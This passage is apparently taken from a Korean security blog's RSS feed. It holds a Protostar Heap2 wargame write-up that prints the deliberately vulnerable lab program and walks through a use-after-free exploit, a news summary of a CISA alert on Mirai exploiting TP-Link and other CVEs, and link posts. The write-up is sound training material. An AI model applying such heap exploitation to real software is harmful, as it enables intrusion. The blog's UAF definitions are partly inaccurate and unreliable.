&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;What Is MITRE ATT CK - Definition | VMware Glossary&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;MITRE ATT CK is a framework, set of data matrices, and assessment tool developed by MITRE Corporation to help organizations understand their security readiness.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.vmware.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;MITRE 홈페이지, &lt;a href=&quot;https://attack.mitre.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://attack.mitre.org/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1683343105373&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;MITRE ATT&amp;amp;CK&amp;reg;&quot; data-og-description=&quot;MITRE ATT&amp;amp;CK&amp;reg; is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&amp;amp;CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private se&quot; data-og-host=&quot;attack.mitre.org&quot; data-og-source-url=&quot;https://attack.mitre.org/&quot; data-og-url=&quot;https://attack.mitre.org/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/cQym40/hySwPYgTNt/sG4JxBMRWYi7fw7AUsxUF1/img.jpg?width=512&amp;amp;height=512&amp;amp;face=0_0_512_512&quot;&gt;&lt;a href=&quot;https://attack.mitre.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://attack.mitre.org/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/cQym40/hySwPYgTNt/sG4JxBMRWYi7fw7AUsxUF1/img.jpg?width=512&amp;amp;height=512&amp;amp;face=0_0_512_512');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;MITRE ATT&amp;amp;CK&amp;reg;&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;MITRE ATT&amp;amp;CK&amp;reg; is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&amp;amp;CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private se&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;attack.mitre.org&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 용어 및 개념  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/630</guid>
      <comments>https://jennana.tistory.com/630#entry630comment</comments>
      <pubDate>Sun, 7 May 2023 23:47:40 +0900</pubDate>
    </item>
    <item>
      <title>[Protostar] Heap2</title>
      <link>https://jennana.tistory.com/629</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;[Protostar]&amp;nbsp;Heap2&lt;/b&gt;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;About&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;This level examines what can happen when heap pointers are stale.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;This level is completed when you see the &amp;ldquo;you have logged in already!&amp;rdquo; message&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;This level is at /opt/protostar/bin/heap2&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #252525;&quot;&gt;이 레벨은 힙 포인터가 오래되었을 때 발생할 수 있는 일을 조사하는 것으로&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #252525;&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;color: #252525;&quot;&gt;you have logged in already!&amp;rdquo;&quot;라는 메시지가 표시되면 이 레벨이 완료된 것입니다.&lt;/span&gt;&lt;span style=&quot;color: #252525;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;pre id=&quot;code_1678325566142&quot; class=&quot;cpp&quot; data-ke-language=&quot;cpp&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;

struct auth {
  char name[32];
  int auth;
};

struct auth *auth;
char *service;

int main(int argc, char **argv)
{
  char line[128];

  while(1) {
      printf(&quot;[ auth = %p, service = %p ]\n&quot;, auth, service);

      if(fgets(line, sizeof(line), stdin) == NULL) break;
      
      if(strncmp(line, &quot;auth &quot;, 5) == 0) {
          auth = malloc(sizeof(auth));
          memset(auth, 0, sizeof(auth));
          if(strlen(line + 5) &amp;lt; 31) {
              strcpy(auth-&amp;gt;name, line + 5);
          }
      }
      if(strncmp(line, &quot;reset&quot;, 5) == 0) {
          free(auth);
      }
      if(strncmp(line, &quot;service&quot;, 6) == 0) {
          service = strdup(line + 7);
      }
      if(strncmp(line, &quot;login&quot;, 5) == 0) {
          if(auth-&amp;gt;auth) {
              printf(&quot;you have logged in already!\n&quot;);
          } else {
              printf(&quot;please enter your password\n&quot;);
          }
      }
  }
}&lt;/code&gt;&lt;/pre&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;auth라는 구조체는 32bytes의 name과 4bytes의 auth로 구성되어 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;main함수가 시작되면서 while문을 돌면서 fgets을 통해서 사용자로 부터 입력을 받는다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;비교하는 곳이 4군데 있는데&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &lt;b&gt;1) strncmp(line, &quot;auth &quot;,5)==0&lt;/b&gt; 이부분에서&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 'auth 입력값'을 사용자가 입력하면, auth = malloc(sizeof(auth));를 통해서 구조체 auth의 크기 만큼 메모리가 할당되고 입력한 값은 auth-&amp;gt;name에 저장된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &lt;b&gt;2) strncmp(line, &quot;reset&quot;,5)==0&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 'reset'을 입력하게 되면, 기존에 할당된 auth의 메모리가 해제됨.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; &lt;b&gt;3) strncmp(line, &quot;service&quot;,6)==0&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; strdup함수를 이용해서 문자열이 복제되고 service포인터는 복제된 문자열을 가리키게 됨.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp; 4) strncmp(line, &quot;login&quot;,5)==0&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; login을 입력하면, auth구조체의 auth필드 값을 확인하여 auth-&amp;gt;auth의 값이 변조 되었으면 성공, 아니면 실패한다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; &lt;/b&gt;&lt;u&gt;&lt;b&gt; User After Free 기법&lt;/b&gt;&lt;/u&gt;을 이용한 공격이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;UAF에 대해서 공부를 하자면,&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;UAF(Uninitialized Use After Free) 기법&lt;/b&gt;은 동적 메모리 할당과 관련된 보안 취약점 중 하나로,&amp;nbsp;&lt;u&gt;&lt;b&gt;이미 해제된 메모리를 계속 사용하게 되어 발생하는 취약점&lt;/b&gt;&lt;/u&gt;이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;일반적으로 &lt;b&gt;동적 메모리 할당 함수(malloc, calloc, realloc 등)&lt;/b&gt;를 사용하여 메모리를 할당하면, 해당 메모리의 주소를 반환받는다. 이후 할당된 메모리를 사용하고자 할 때에는 해당 메모리 주소를 이용하여 접근하게 된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  그러나 이렇게 사용된 메모리를 해제해 주지 않으면, 이미 해제된 메모리를 사용하게 되면서 UAF 취약점이 발생&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  UAF 취약점은 일반적으로 다음과 같은 상황에서 발생 :&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 1) 메모리 할당 후 해당 메모리를 해제하지 않은 경우&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 2) 이미 해제된 메모리를 계속 사용하는 경우&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;예를 들어, 다음과 같은 코드가 있다고 가정&lt;/p&gt;
&lt;div&gt;
&lt;div&gt;
&lt;pre id=&quot;code_1678357834789&quot; class=&quot;cpp&quot; data-ke-language=&quot;cpp&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;#include &amp;lt;stdlib.h&amp;gt; 
#include &amp;lt;stdio.h&amp;gt; 
int main() { 
  int *p = malloc(sizeof(int)); 
  *p = 10; 
  free(p); 
  printf(&quot;%d\n&quot;, *p); 
  return 0; 
}&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;div&gt;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. 위 코드에서는 먼저 malloc 함수를 이용하여&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;   int 자료형 크기만큼의 메모리를 할당&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;   이후 해당 메모리에 10을 저장&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 그러나 이후 free 함수를 이용하여 p가 가리키는 메모리를 해제합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3. 그리고 나서 p가 가리키는 메모리에 접근하여 그 값을 출력하려고 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;   이때 이미 해제된 메모리를 접근하게 되므로 &lt;b&gt;UAF 취약점이 발생&lt;/b&gt;합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;UAF 예방 방법 :&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 1) 메모리를 해제한 후에는 해당 메모리를 더 이상 사용하지 않도록 NULL 값을 할당&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 2) 포인터를 이용하여 메모리에 접근하기 전에는 해당 포인터가 NULL인지 확인&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;문제를 풀기위해서는 login을 입력하였을 때, auth-&amp;gt;auth에 값이 있어서 &quot;you have logged in already!&quot;라는 문자가 나와야 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;auth를 malloc으로 메모리를 할당하고, free로 메모리 해제를 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  auth 포인터가 가리키는 구조체 &lt;b&gt;auth 필드&lt;/b&gt;는 해제되기 이전의 값을 계속 가지고 있음.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;strdup 함수&lt;/b&gt;는 인자로 전달된 문자열을 &lt;b&gt;동적으로 할당(malloc)&lt;/b&gt;하고, 그 문자열을 복사하여 반환하는 함수이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;  strdup으로 service를 할당하게 되면다면, 아마 기존에 해제되었던 부분에 접근 가능해진다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;500&quot; data-origin-height=&quot;228&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dFQX71/btr2Yhr2HZh/rkq2vsTKaktlzTr0DPaSuk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dFQX71/btr2Yhr2HZh/rkq2vsTKaktlzTr0DPaSuk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dFQX71/btr2Yhr2HZh/rkq2vsTKaktlzTr0DPaSuk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdFQX71%2Fbtr2Yhr2HZh%2Frkq2vsTKaktlzTr0DPaSuk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;500&quot; height=&quot;228&quot; data-origin-width=&quot;500&quot; data-origin-height=&quot;228&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;여기서 auth와 service의 주소를 보면 0x10(10진수로 16bytes)가 차이 난다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;즉 기존의 auth의 name 32bytes에서 포인터 시작부분에서 16bytes 떨어진 곳에 service가 시작된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그래서 service 값으로 17bytes를 넣어주면 기존에 auth의 auth부분이 덮어써지게 된다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;500&quot; data-origin-height=&quot;211&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cm2fzB/btr2ZSyw9z9/FDyPT9FyKwUdFOLKst2VmK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cm2fzB/btr2ZSyw9z9/FDyPT9FyKwUdFOLKst2VmK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cm2fzB/btr2ZSyw9z9/FDyPT9FyKwUdFOLKst2VmK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcm2fzB%2Fbtr2ZSyw9z9%2FFDyPT9FyKwUdFOLKst2VmK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;500&quot; height=&quot;211&quot; data-origin-width=&quot;500&quot; data-origin-height=&quot;211&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;그래서 다시 service의 입력값으로 B 16개(16bytes) + 엔터 1byte로 17bytes을 주면, 성공한다!&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;500&quot; data-origin-height=&quot;211&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/crAM8W/btr2ZyG4DAa/IH61tnbcv7VRhlugcOo6p1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/crAM8W/btr2ZyG4DAa/IH61tnbcv7VRhlugcOo6p1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/crAM8W/btr2ZyG4DAa/IH61tnbcv7VRhlugcOo6p1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcrAM8W%2Fbtr2ZyG4DAa%2FIH61tnbcv7VRhlugcOo6p1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;500&quot; height=&quot;211&quot; data-origin-width=&quot;500&quot; data-origin-height=&quot;211&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Wargame  /⭐ Protostar</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/629</guid>
      <comments>https://jennana.tistory.com/629#entry629comment</comments>
      <pubDate>Thu, 4 May 2023 23:51:56 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 미국 CISA, &amp;ldquo;미라이 봇넷이 패치 안 된 TP링크 라우터들 노린다&amp;rdquo; 경고</title>
      <link>https://jennana.tistory.com/628</link>
      <description>&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;799&quot; data-origin-height=&quot;597&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bytjmx/btsdPCrZLei/jrWF2ooIfANxK0QcllFOP1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bytjmx/btsdPCrZLei/jrWF2ooIfANxK0QcllFOP1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bytjmx/btsdPCrZLei/jrWF2ooIfANxK0QcllFOP1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbytjmx%2FbtsdPCrZLei%2FjrWF2ooIfANxK0QcllFOP1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;799&quot; height=&quot;597&quot; data-origin-width=&quot;799&quot; data-origin-height=&quot;597&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;CISA에서 TP-Link 라우터를 취약점을 타겟으로 하는 미라이(Mirai) 봇넷 취약점을 3개 더 추가하면서 공격에 유의를 주의했으며 해당 공격에 대한 패치가 배포되고 있어 빠른 조치가 필요해 보인다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;[ 미라이 봇넷 ]&lt;br&gt;Mirai 악성코드는 감염된 Linux 기반 사물 인터넷(IoT) 장치를 원격으로 제어할 수 있는 봇넷으로 롤업하여 분산 서비스 거부(DDoS) 공격을 포함한 대규모 네트워크 공격을 수행&lt;br&gt;&lt;br&gt;[ 3개 취약점 ]&lt;br&gt;1) CVE-2023-1389 (TP-Link Archer AX-21 Command Injection Vulnerability)&lt;br&gt;- CVE-2023-1389로 추정되는 TP-Link의 Archer AX21 Wi-Fi 6 라우터의 명령 주입 결함은 문제를 해결하는 버전 1.1.4 빌드 20230219 이전의 장치 펌웨어에 숨어 있음.&amp;nbsp;&amp;nbsp;&lt;br&gt;- 권한이 없는 공격자는 이 취약점을 악용하여 RCE(원격 코드 실행)로 이어질 수 있는 명령을 주입하여 침입자가 네트워크 또는 인터넷을 통해 장치를 제어&lt;br&gt;&lt;br&gt;2) CVE-2023-21839 (Oracle WebLogic Server Unspecified Vulnerability)&lt;br&gt;오라클 웹로직 서버 지정되지&amp;nbsp;&amp;nbsp;않은 취약점&lt;br&gt;&lt;br&gt;3) CVE-2021-45046 (Apache Log4j2 Deserialization of Untrusted Data Vulnerability)&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;gt; Log4j 취약점과 Log4Shell 취약점과 관련됨&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;문가용 기자, 미국 CISA, “미라이 봇넷이 패치 안 된 TP링크 라우터들 노린다” 경고, 보안뉴스, &lt;a href=&quot;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=117755&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=117755&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;미국 CISA, “미라이 봇넷이 패치 안 된 TP링크 라우터들 노린다” 경고&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;IT 외신 레지스터에 의하면 미라이(Mirai)라는 악명 높은 봇넷이 패치되지 않은 TP링크(TP-Link) 라우터들을 공략하는 중이라고 한다. 미국 CISA는 특히 유의해야 할 취약점 세 개를 시급한 패치가 필&quot; data-og-host=&quot;m.boannews.com&quot; data-og-source-url=&quot;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=117755&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/2DpyR/hyStM9ITne/mvwypmSPvGUv6QomSFqB51/img.jpg?width=750&amp;amp;height=421&amp;amp;face=0_0_750_421&quot; data-og-url=&quot;http://m.boannews.com/html/detail.html?idx=117755&quot;&gt;&lt;a href=&quot;http://m.boannews.com/html/detail.html?idx=117755&quot; target=&quot;_blank&quot; data-source-url=&quot;https://m.boannews.com/html/detail.html?tab_type=1&amp;amp;idx=117755&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/2DpyR/hyStM9ITne/mvwypmSPvGUv6QomSFqB51/img.jpg?width=750&amp;amp;height=421&amp;amp;face=0_0_750_421')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;미국 CISA, “미라이 봇넷이 패치 안 된 TP링크 라우터들 노린다” 경고&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;IT 외신 레지스터에 의하면 미라이(Mirai)라는 악명 높은 봇넷이 패치되지 않은 TP링크(TP-Link) 라우터들을 공략하는 중이라고 한다. 미국 CISA는 특히 유의해야 할 취약점 세 개를 시급한 패치가 필&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;m.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;Jeff Burt, Mirai botnet loves exploiting your unpatched TP-Link routers, CISA warns, The Register, &lt;a href=&quot;https://www.theregister.com/2023/05/02/cisa_exploited_flaws_oracle_apache/&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://www.theregister.com/2023/05/02/cisa_exploited_flaws_oracle_apache/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;CISA warns of Mirai botnet exploiting TP-Link routers&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs&quot; data-og-host=&quot;www.theregister.com&quot; data-og-source-url=&quot;https://www.theregister.com/2023/05/02/cisa_exploited_flaws_oracle_apache/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/KNEzM/hyStVZSRpj/ukQQUZ48s3M0Cock4dKawk/img.jpg?width=1000&amp;amp;height=667&amp;amp;face=0_0_1000_667&quot; data-og-url=&quot;https://www.theregister.com/2023/05/02/cisa_exploited_flaws_oracle_apache/&quot;&gt;&lt;a href=&quot;https://www.theregister.com/2023/05/02/cisa_exploited_flaws_oracle_apache/&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.theregister.com/2023/05/02/cisa_exploited_flaws_oracle_apache/&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/KNEzM/hyStVZSRpj/ukQQUZ48s3M0Cock4dKawk/img.jpg?width=1000&amp;amp;height=667&amp;amp;face=0_0_1000_667')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;CISA warns of Mirai botnet exploiting TP-Link routers&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.theregister.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/628</guid>
      <comments>https://jennana.tistory.com/628#entry628comment</comments>
      <pubDate>Wed, 3 May 2023 23:09:05 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] '비행기 탑승모드' 아직 필요한 이유는?</title>
      <link>https://jennana.tistory.com/627</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;670&quot; data-origin-height=&quot;761&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bI0RUI/btr9ywKdJF9/jan8TMk8hu7oOPIvI6TyUK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bI0RUI/btr9ywKdJF9/jan8TMk8hu7oOPIvI6TyUK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bI0RUI/btr9ywKdJF9/jan8TMk8hu7oOPIvI6TyUK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbI0RUI%2Fbtr9ywKdJF9%2Fjan8TMk8hu7oOPIvI6TyUK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;670&quot; height=&quot;761&quot; data-origin-width=&quot;670&quot; data-origin-height=&quot;761&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
